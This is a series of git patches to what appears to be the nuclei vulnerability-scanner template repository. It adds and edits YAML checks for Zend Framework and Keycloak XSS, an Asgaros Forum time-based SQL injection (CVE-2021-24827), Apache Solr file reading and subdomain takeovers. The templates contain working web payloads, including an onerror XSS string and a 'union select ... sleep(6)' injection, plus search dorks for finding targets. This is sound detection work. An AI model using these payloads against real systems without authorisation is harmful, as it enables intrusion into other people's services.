b/vulnerabilities/zend/zend-v1-xss.yaml index 2f9dbda3b7..76de7d8ef7 100644 --- a/vulnerabilities/zend/zend-v1-xss.yaml +++ b/vulnerabilities/zend/zend-v1-xss.yaml @@ -4,21 +4,22 @@ info: name: ZendFramework 1.12.2 - Cross-Site Scripting author: c3l3si4n severity: medium - description: ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter. + description: | + ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter. reference: - https://twitter.com/c3l3si4n/status/1600035722148212737 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 + metadata: + verified: true + google-dork: inurl:"/tests/Zend/Http/" tags: zend,zendframework,xss requests: - method: GET path: - - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(1)>%20a='test'>" - - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(document.domain)%20a='test'>" + - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(1)>" + - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(document.domain)>" + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -29,11 +30,11 @@ requests: - '<img/src=x onerror=alert(document.domain)' condition: and - - type: status - status: - - 200 - - type: word part: header words: - - "text/html" + - text/html + + - type: status + status: + - 200 From 441a43ae08421c66a5e76c2a992d468cc2c98d36 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 17:33:05 +0000 Subject: [PATCH 0252/1133] Auto Generated New Template Addition List [Wed Dec 7 17:33:05 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9be8811cad..01b21e6be3 100644 --- a/.new-additions +++ b/.new-additions @@ -3,3 +3,4 @@ exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml misconfiguration/installer/metaview-explorer-installer.yaml network/detection/redis-detect.yaml +vulnerabilities/zend/zend-v1-xss.yaml From 43bf747a6c7f0142b977d669c0cf7f94e9ceae58 Mon Sep 17 00:00:00 2001 From: ndmalc <> Date: Wed, 7 Dec 2022 22:34:02 +0100 Subject: [PATCH 0253/1133] Add template for CVE-2021-20323 --- cves/2021/CVE-2021-20323.yaml | 51 +++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 cves/2021/CVE-2021-20323.yaml diff --git a/cves/2021/CVE-2021-20323.yaml b/cves/2021/CVE-2021-20323.yaml new file mode 100644 index 0000000000..95fde9019a --- /dev/null +++ b/cves/2021/CVE-2021-20323.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-20323 + +info: + name: Keycloak before 18.0.0 - Reflected XSS on clients-registrations endpoint + author: ndmalc + severity: medium + description: Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact. + reference: + - https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j + - https://nvd.nist.gov/vuln/detail/CVE-2021-20323 + - https://bugzilla.redhat.com/show_bug.cgi?id=2013577 + - https://access.redhat.com/security/cve/CVE-2021-20323 + - https://github.com/ndmalc/CVE-2021-20323 + - https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-20323 + cwe-id: CWE-79 + tags: keycloak,xss,reflected,unauth,cve,cve2021 + +variables: +# Variable to set the realm on which the request is executed +# Can be usefull to manually set something else than master as it could be path restricted +# nuclei does not allow user provided variable + realm: "master" + +requests: + - method: POST + headers: + Content-Type: application/json + path: + # Currently no nice way to have conditionnal testing + - "{{BaseURL}}/auth/realms/{{realm}}/clients-registrations/default" + - "{{BaseURL}}/auth/realms/{{realm}}/clients-registrations/openid-connect" + - "{{BaseURL}}/realms/{{realm}}/clients-registrations/default" + - "{{BaseURL}}/realms/{{realm}}/clients-registrations/openid-connect" + body: "{\"TestFlag\":1}" + + stop-at-first-match: true + matchers-condition: and + matchers: + # Uses a non-XSS match to avoid WAF detection + - type: word + words: + - "Unrecognized field \"TestFlag\"" + part: body + - type: word + words: + - "Content-Type: text/html" + part: header \ No newline at end of file From 295171f7bde018483d8d2f5bdfd5ce44a82c408d Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Wed, 7 Dec 2022 21:48:51 -0500 Subject: [PATCH 0254/1133] Create leadpages-takeover.yaml --- takeovers/leadpages-takeover.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 takeovers/leadpages-takeover.yaml diff --git a/takeovers/leadpages-takeover.yaml b/takeovers/leadpages-takeover.yaml new file mode 100644 index 0000000000..576d3594a2 --- /dev/null +++ b/takeovers/leadpages-takeover.yaml @@ -0,0 +1,27 @@ +id: leadpages-takeover + +info: + name: Leadpages takeover detection + author: philippedelteil + severity: high + reference: + - https://www.youtube.com/watch?v=HRFplefT46U + + tags: takeover + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - Host != ip + + - type: word + words: + - "<h1>We couldn't find that page</h1>" + - "<title>404 Not Found" + condition: and From 559e371bfd3902b57b1bb2eca6b383fe34c94dc8 Mon Sep 17 00:00:00 2001 From: th3r4id Date: Thu, 8 Dec 2022 10:23:35 +0530 Subject: [PATCH 0255/1133] Update github-takeover.yaml --- takeovers/github-takeover.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/takeovers/github-takeover.yaml b/takeovers/github-takeover.yaml index 8bc65bd66c..4cb6a03c21 100644 --- a/takeovers/github-takeover.yaml +++ b/takeovers/github-takeover.yaml @@ -23,6 +23,7 @@ requests: words: - "There isn't a GitHub Pages site here." - "For root URLs (like http://example.com/) you must provide an index.html file" + - "For root URLs (like http://example.com/) you must provide an" condition: or - type: dsl @@ -31,3 +32,6 @@ requests: - '!contains(host,"github.com")' - '!contains(host,"github.io")' condition: and + + + # updated by piyushchhiroliya From 5beef1c8b1882414bfada7e8b5b3cde075c800bf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 8 Dec 2022 10:28:00 +0530 Subject: [PATCH 0256/1133] Update github-takeover.yaml --- takeovers/github-takeover.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/takeovers/github-takeover.yaml b/takeovers/github-takeover.yaml index 4cb6a03c21..26fd790336 100644 --- a/takeovers/github-takeover.yaml +++ b/takeovers/github-takeover.yaml @@ -32,6 +32,3 @@ requests: - '!contains(host,"github.com")' - '!contains(host,"github.io")' condition: and - - - # updated by piyushchhiroliya From 357af30a0c81418ea1dcab19f847503db0c3c062 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 8 Dec 2022 10:28:34 +0530 Subject: [PATCH 0257/1133] Update github-takeover.yaml --- takeovers/github-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/github-takeover.yaml b/takeovers/github-takeover.yaml index 26fd790336..b722aede74 100644 --- a/takeovers/github-takeover.yaml +++ b/takeovers/github-takeover.yaml @@ -2,7 +2,7 @@ id: github-takeover info: name: github takeover detection - author: pdteam + author: pdteam,th3r4id severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz From 5ac1e2721d45761a7813fe0883c75aa1778abd1b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 05:13:01 +0000 Subject: [PATCH 0258/1133] Auto Generated New Template Addition List [Thu Dec 8 05:13:01 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 01b21e6be3..18f7fb4bd4 100644 --- a/.new-additions +++ b/.new-additions @@ -2,5 +2,6 @@ exposed-panels/aircube-dashboard-panel.yaml exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml misconfiguration/installer/metaview-explorer-installer.yaml +network/detection/cisco-finger-detect.yaml network/detection/redis-detect.yaml vulnerabilities/zend/zend-v1-xss.yaml From 4edcbb15cce604f56851b5c6b54161378bc28f75 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 10:53:09 +0530 Subject: [PATCH 0259/1133] Update CVE-2021-20323.yaml --- cves/2021/CVE-2021-20323.yaml | 45 +++++++++++++++-------------------- 1 file changed, 19 insertions(+), 26 deletions(-) diff --git a/cves/2021/CVE-2021-20323.yaml b/cves/2021/CVE-2021-20323.yaml index 95fde9019a..6aa6d7e39c 100644 --- a/cves/2021/CVE-2021-20323.yaml +++ b/cves/2021/CVE-2021-20323.yaml @@ -1,51 +1,44 @@ id: CVE-2021-20323 info: - name: Keycloak before 18.0.0 - Reflected XSS on clients-registrations endpoint + name: Keycloak < 18.0.0 - Cross Site Scripting author: ndmalc severity: medium - description: Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact. + description: | + Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact. reference: - https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j - - https://nvd.nist.gov/vuln/detail/CVE-2021-20323 - https://bugzilla.redhat.com/show_bug.cgi?id=2013577 - https://access.redhat.com/security/cve/CVE-2021-20323 - https://github.com/ndmalc/CVE-2021-20323 - https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d + - https://nvd.nist.gov/vuln/detail/CVE-2021-20323 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 cve-id: CVE-2021-20323 - cwe-id: CWE-79 - tags: keycloak,xss,reflected,unauth,cve,cve2021 - -variables: -# Variable to set the realm on which the request is executed -# Can be usefull to manually set something else than master as it could be path restricted -# nuclei does not allow user provided variable - realm: "master" + tags: cve,cve2021,keycloak,xss requests: - method: POST + path: + - "{{BaseURL}}/auth/realms/master/clients-registrations/default" + - "{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect" + - "{{BaseURL}}/realms/master/clients-registrations/default" + - "{{BaseURL}}/realms/master/clients-registrations/openid-connect" + headers: Content-Type: application/json - path: - # Currently no nice way to have conditionnal testing - - "{{BaseURL}}/auth/realms/{{realm}}/clients-registrations/default" - - "{{BaseURL}}/auth/realms/{{realm}}/clients-registrations/openid-connect" - - "{{BaseURL}}/realms/{{realm}}/clients-registrations/default" - - "{{BaseURL}}/realms/{{realm}}/clients-registrations/openid-connect" - body: "{\"TestFlag\":1}" + + body: "{\"Test\":1}" stop-at-first-match: true matchers-condition: and matchers: - # Uses a non-XSS match to avoid WAF detection - type: word - words: - - "Unrecognized field \"TestFlag\"" part: body - - type: word words: - - "Content-Type: text/html" - part: header \ No newline at end of file + - 'Unrecognized field "Test' + + - type: word + part: header + words: + - text/html From af424a7d5c9ecc5103bd3003d428eee7f01ae837 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 10:55:41 +0530 Subject: [PATCH 0260/1133] Update CVE-2021-20323.yaml --- cves/2021/CVE-2021-20323.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/cves/2021/CVE-2021-20323.yaml b/cves/2021/CVE-2021-20323.yaml index 6aa6d7e39c..1343755085 100644 --- a/cves/2021/CVE-2021-20323.yaml +++ b/cves/2021/CVE-2021-20323.yaml @@ -15,6 +15,9 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-20323 classification: cve-id: CVE-2021-20323 + metadata: + verified: true + shodan-query: html:"Keycloak" tags: cve,cve2021,keycloak,xss requests: @@ -42,3 +45,7 @@ requests: part: header words: - text/html + + - type: status + status: + - 400 From d21844ebae8fe9c5bcfb79bfd97e74e53ffcc78b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 10:57:20 +0530 Subject: [PATCH 0261/1133] Update CVE-2021-20323.yaml --- cves/2021/CVE-2021-20323.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20323.yaml b/cves/2021/CVE-2021-20323.yaml index 1343755085..48f7128d8a 100644 --- a/cves/2021/CVE-2021-20323.yaml +++ b/cves/2021/CVE-2021-20323.yaml @@ -29,7 +29,7 @@ requests: - "{{BaseURL}}/realms/master/clients-registrations/openid-connect" headers: - Content-Type: application/json + Content-Type: application/json body: "{\"Test\":1}" From 0d3c48471eed44b395bc9e632bd8b7d075671b35 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 11:00:07 +0530 Subject: [PATCH 0262/1133] Update github-takeover.yaml --- takeovers/github-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/github-takeover.yaml b/takeovers/github-takeover.yaml index b722aede74..b383d6b14a 100644 --- a/takeovers/github-takeover.yaml +++ b/takeovers/github-takeover.yaml @@ -1,7 +1,7 @@ id: github-takeover info: - name: github takeover detection + name: Github Takeover Detection author: pdteam,th3r4id severity: high reference: From 2be41a05809b6a7d9101545f4aa39d3ad3a4ab5f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 05:35:37 +0000 Subject: [PATCH 0263/1133] Auto Generated New Template Addition List [Thu Dec 8 05:35:37 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 18f7fb4bd4..0e3b5d5929 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2021/CVE-2021-20323.yaml exposed-panels/aircube-dashboard-panel.yaml exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml From e4ecb47a264d0bf86a11cb509061a1d1818c0ee2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 05:55:10 +0000 Subject: [PATCH 0265/1133] Auto Generated CVE annotations [Thu Dec 8 05:55:10 UTC 2022] :robot: --- cves/2021/CVE-2021-20323.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20323.yaml b/cves/2021/CVE-2021-20323.yaml index 48f7128d8a..98a22911c8 100644 --- a/cves/2021/CVE-2021-20323.yaml +++ b/cves/2021/CVE-2021-20323.yaml @@ -14,10 +14,13 @@ info: - https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d - https://nvd.nist.gov/vuln/detail/CVE-2021-20323 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2021-20323 + cwe-id: CWE-79 metadata: - verified: true shodan-query: html:"Keycloak" + verified: "true" tags: cve,cve2021,keycloak,xss requests: From c3d1917fde9efd1f5633cf0b50796b1068764ceb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 14:15:54 +0530 Subject: [PATCH 0266/1133] Update leadpages-takeover.yaml --- takeovers/leadpages-takeover.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/takeovers/leadpages-takeover.yaml b/takeovers/leadpages-takeover.yaml index 576d3594a2..6b483f5e8a 100644 --- a/takeovers/leadpages-takeover.yaml +++ b/takeovers/leadpages-takeover.yaml @@ -6,8 +6,9 @@ info: severity: high reference: - https://www.youtube.com/watch?v=HRFplefT46U - - tags: takeover + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/166 + - https://github.com/PushpenderIndia/subdover/issues/2 + tags: takeover,leadpages requests: - method: GET @@ -23,5 +24,6 @@ requests: - type: word words: - "

We couldn't find that page

" - - "404 Not Found" - condition: and + - "The page you’re looking for may have been moved" + - "Double-check that you have the right web address and give it another go!" + condition: or From 45576d3247870f0368da65f25d755382cb8216c3 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Thu, 8 Dec 2022 14:20:03 +0530 Subject: [PATCH 0267/1133] Added template for CVE-2021-24827 --- cves/2021/CVE-2021-24827.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-24827.yaml diff --git a/cves/2021/CVE-2021-24827.yaml b/cves/2021/CVE-2021-24827.yaml new file mode 100644 index 0000000000..93420ce7b0 --- /dev/null +++ b/cves/2021/CVE-2021-24827.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-24827 + +info: + name: Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection + author: theamanrawat + severity: critical + description: | + The Asgaros Forum WordPress plugin before 1.15.13 does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue. + reference: + - https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1 + - https://wordpress.org/plugins/asgaros-forum/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24827 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24827 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,asgaros-forum,unauth + +requests: + - raw: + - | + @timeout: 15s + GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "Asgaros Forum")' + condition: and \ No newline at end of file From 57708b145c5e0ee46e62032a516e0578b9b58598 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 14:33:38 +0530 Subject: [PATCH 0268/1133] Update CVE-2021-24827.yaml --- cves/2021/CVE-2021-24827.yaml | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-24827.yaml b/cves/2021/CVE-2021-24827.yaml index 93420ce7b0..378aa52ec4 100644 --- a/cves/2021/CVE-2021-24827.yaml +++ b/cves/2021/CVE-2021-24827.yaml @@ -11,13 +11,10 @@ info: - https://wordpress.org/plugins/asgaros-forum/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24827 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2021-24827 - cwe-id: CWE-89 metadata: - verified: "true" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,asgaros-forum,unauth + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,asgaros-forum,unauth requests: - raw: @@ -32,5 +29,5 @@ requests: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "text/html")' - - 'contains(body, "Asgaros Forum")' - condition: and \ No newline at end of file + - 'contains(body, "asgarosforum")' + condition: and From c5d280b3594ace2a7cf71c13c158b9f08ef2fc52 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 14:42:36 +0530 Subject: [PATCH 0270/1133] Update apache-solr-file-read.yaml --- .../apache/apache-solr-file-read.yaml | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index ef6252d216..be0bac2d85 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -35,18 +35,10 @@ requests: Accept-Language: en Connection: close - extractors: - - type: regex - internal: true - name: core - group: 1 - regex: - - '"name"\:"(.*?)"' - stop-at-first-match: true + matchers-condition: or matchers: - type: word - name: "windows" part: body words: - "bit app support" @@ -55,6 +47,13 @@ requests: condition: and - type: regex - name: "linux" regex: - "root:.*:0:0:" + + extractors: + - type: regex + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + internal: true From 4a3c11036ff633e3d0d5a53b5b245af1b4e3625e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:21:45 +0000 Subject: [PATCH 0272/1133] Auto Generated New Template Addition List [Thu Dec 8 09:21:45 UTC 2022] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 0e3b5d5929..e713da89c0 100644 --- a/.new-additions +++ b/.new-additions @@ -1,8 +1,10 @@ cves/2021/CVE-2021-20323.yaml +default-logins/apache/karaf-default-login.yaml exposed-panels/aircube-dashboard-panel.yaml exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml misconfiguration/installer/metaview-explorer-installer.yaml network/detection/cisco-finger-detect.yaml network/detection/redis-detect.yaml +technologies/apache/apache-karaf-panel.yaml vulnerabilities/zend/zend-v1-xss.yaml From d96973641dd4cfe31593b641e1c58dcac909485d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 8 Dec 2022 14:53:14 +0530 Subject: [PATCH 0274/1133] Rename CVE-2019-6802.yaml to cves/2019/CVE-2019-6802.yaml --- CVE-2019-6802.yaml => cves/2019/CVE-2019-6802.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename CVE-2019-6802.yaml => cves/2019/CVE-2019-6802.yaml (100%) diff --git a/CVE-2019-6802.yaml b/cves/2019/CVE-2019-6802.yaml similarity index 100% rename from CVE-2019-6802.yaml rename to cves/2019/CVE-2019-6802.yaml From 0cf1257964a6835fb693572d0dbbd9b398b21cda Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 14:53:17 +0530 Subject: [PATCH 0275/1133] Update homeworks-illumination.yaml --- iot/homeworks-illumination.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/iot/homeworks-illumination.yaml b/iot/homeworks-illumination.yaml index 7712bba606..37de8590f9 100644 --- a/iot/homeworks-illumination.yaml +++ b/iot/homeworks-illumination.yaml @@ -21,7 +21,6 @@ requests: - type: word words: - "HomeWorks Illumination Web Keypad" - - "lutron.js" - "Lutron HomeWorks" condition: and From 6fb0065035fb3b5e306e1088999be3ce324dc150 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:23:54 +0000 Subject: [PATCH 0276/1133] Auto Generated New Template Addition List [Thu Dec 8 09:23:53 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e713da89c0..d3b65b5fd8 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ default-logins/apache/karaf-default-login.yaml exposed-panels/aircube-dashboard-panel.yaml exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml +exposures/files/routes-ini.yaml misconfiguration/installer/metaview-explorer-installer.yaml network/detection/cisco-finger-detect.yaml network/detection/redis-detect.yaml From 687ba9ce7d124b463c61dc9b68763a9a0b771ca7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:25:24 +0000 Subject: [PATCH 0278/1133] Auto Generated New Template Addition List [Thu Dec 8 09:25:24 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d3b65b5fd8..7e7e1a380a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2019/CVE-2019-6802.yaml cves/2021/CVE-2021-20323.yaml default-logins/apache/karaf-default-login.yaml exposed-panels/aircube-dashboard-panel.yaml From 4c2b2f76fdf02c92493611ba411c12888d9060fe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:26:18 +0000 Subject: [PATCH 0279/1133] Auto Generated New Template Addition List [Thu Dec 8 09:26:18 UTC 2022] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 7e7e1a380a..58db1c86e4 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,7 @@ cves/2019/CVE-2019-6802.yaml cves/2021/CVE-2021-20323.yaml +cves/2022/CVE-2022-0826.yaml +cves/2022/CVE-2022-0948.yaml default-logins/apache/karaf-default-login.yaml exposed-panels/aircube-dashboard-panel.yaml exposed-panels/mag-dashboard-panel.yaml From 7295e688737ac5ad1437a42ded3a86388c1228a6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:27:36 +0000 Subject: [PATCH 0281/1133] Auto Generated New Template Addition List [Thu Dec 8 09:27:36 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 58db1c86e4..c7c7188512 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ cves/2019/CVE-2019-6802.yaml cves/2021/CVE-2021-20323.yaml +cves/2021/CVE-2021-24827.yaml cves/2022/CVE-2022-0826.yaml cves/2022/CVE-2022-0948.yaml default-logins/apache/karaf-default-login.yaml From 7182ecb48df220b695e9bc719b151f79769b5077 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 14:58:06 +0530 Subject: [PATCH 0282/1133] Update putty-private-key-disclosure.yaml --- exposures/files/putty-private-key-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/putty-private-key-disclosure.yaml b/exposures/files/putty-private-key-disclosure.yaml index 2f724217a0..5226890a13 100644 --- a/exposures/files/putty-private-key-disclosure.yaml +++ b/exposures/files/putty-private-key-disclosure.yaml @@ -27,10 +27,10 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "PuTTY-User-Key-File" - "Encryption:" - part: body condition: and - type: status From 50eb3e8fb9a604e8de60038d301150e7264ea92a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:29:00 +0000 Subject: [PATCH 0283/1133] Auto Generated New Template Addition List [Thu Dec 8 09:29:00 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c7c7188512..8c61bc7c91 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ exposed-panels/aircube-dashboard-panel.yaml exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml exposures/files/routes-ini.yaml +iot/homeworks-illumination.yaml misconfiguration/installer/metaview-explorer-installer.yaml network/detection/cisco-finger-detect.yaml network/detection/redis-detect.yaml From 5ab08d10976a078fa015262c55b4475c3d2955ed Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:32:58 +0000 Subject: [PATCH 0284/1133] Auto Generated New Template Addition List [Thu Dec 8 09:32:58 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8c61bc7c91..f21725db0c 100644 --- a/.new-additions +++ b/.new-additions @@ -12,5 +12,6 @@ iot/homeworks-illumination.yaml misconfiguration/installer/metaview-explorer-installer.yaml network/detection/cisco-finger-detect.yaml network/detection/redis-detect.yaml +takeovers/leadpages-takeover.yaml technologies/apache/apache-karaf-panel.yaml vulnerabilities/zend/zend-v1-xss.yaml From 37915272e44d31db1dc88a16405a1210390950a2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 15:04:51 +0530 Subject: [PATCH 0286/1133] Update error-logs.yaml --- exposures/logs/error-logs.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml index 2d7fa5d6d2..b3eb38dbd0 100644 --- a/exposures/logs/error-logs.yaml +++ b/exposures/logs/error-logs.yaml @@ -1,7 +1,7 @@ id: error-logs info: - name: common error log files + name: Common Error Log Files author: geeknik,daffainfo,ELSFA7110,Hardik-Solanki severity: low tags: logs,exposure,error @@ -39,6 +39,7 @@ requests: - "{{BaseURL}}/{{Hostname}}/error.log" - 